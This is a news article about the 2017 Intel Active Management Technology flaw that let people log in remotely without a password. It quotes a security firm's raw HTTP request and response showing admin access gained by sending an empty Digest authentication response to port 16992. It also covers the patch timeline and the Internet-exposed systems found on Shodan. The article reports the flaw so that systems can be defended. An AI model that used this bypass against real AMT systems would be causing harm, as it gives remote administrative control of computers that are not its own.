Biz & IT —

The hijacking flaw that lurked in Intel chips is worse than anyone thought

Patch for severe authentication bypass bug won’t be available until next week.

The hijacking flaw that lurked in Intel chips is worse than anyone thought

A remote hijacking flaw that lurked in Intel chips for seven years was more severe than many people imagined, because it allowed hackers to remotely gain administrative control over huge fleets of computers without entering a password. This is according to technical analyses published Friday.

As Ars reported Monday, the authentication bypass vulnerability resides in a feature known as Active Management Technology. AMT, as it's usually called, allows system administrators to perform a variety of powerful tasks over a remote connection. Among the capabilities: changing the code that boots up computers, accessing the computer's mouse, keyboard, and monitor, loading and executing programs, and remotely powering on computers that are turned off. In short, AMT makes it possible to log into a computer and exercise the same control enjoyed by administrators with physical access.

AMT, which is available with many vPro processors, was set up to require a password before it could be remotely accessed over a Web browser interface. But, remarkably, that authentication mechanism can be bypassed by entering no text at all. According to a blog post published Friday by Tenable Network Security, the cryptographic hash that the interface's digest access authentication requires to verify someone is authorized to log in can be anything at all, including no string at all.

"Authentication still worked" even when the wrong hash was entered, Tenable Director of Reverse Engineering Carlos Perez wrote. "We had discovered a complete bypass of the authentication scheme."

A separate technical analysis from Embedi, the security firm Intel credited with first disclosing the vulnerability, arrived at the same conclusion. It stated:

With a little help of the local proxy at `127.0.0.1:16992`, which is
meant to replace the response with an empty string, we're able to manage the AMT via the regular Web browser as if we've known the *admin* password:

```

GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest
realm="Digest:048A0000000000000000000000000000",
nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 678
Connection: close

GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Digest username="admin",
realm="Digest:048A0000000000000000000000000000",
nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="",
qop=auth, nc=00000001, cnonce="60513ab58858482c"

HTTP/1.1 200 OK
Date: Thu, 4 May 2017 16:09:17 GMT
Server: AMT
Content-Type: text/html
Transfer-Encoding: chunked
Cache-Control: no cache
Expires: Thu, 26 Oct 1995 00:00:00 GMT

04E6

Embedi e-mailed the analysis to reporters, but didn't publish it online.

Making matters worse, unauthorized accesses typically aren't logged by the PC because AMT has direct access to the computer's network hardware. When AMT is enabled, all network packets are redirected to the Intel Management Engine and from there to the AMT. The packets bypass the OS completely. The vulnerable management features were made available in some but not all Intel chipsets starting in 2010, Embedi has said.

In a blog post published Friday, Intel officials said they expect PC makers to release a patch next week. The releases will update Intel firmware, meaning patching will require that each vulnerable chip set is reflashed. In the meantime, Intel is urging customers to download and run this discovery tool to diagnose potentially vulnerable computers. Systems that test positive should be temporarily secured using this mitigation guide until a patch is supplied. Computer makers Fujitsu, HP, and Lenovo, have also issued advisories for specific models they sell.

[Update, 5:40pm EDT] A query of the Shodan security search engine found over 8,500 systems with the AMT interface exposed to the Internet, with over 2,000 in the United States alone:

One of the hits for the AMT interface on Shodan.
Enlarge / One of the hits for the AMT interface on Shodan.

Many others may be accessible via organizational networks.

 

Channel Ars Technica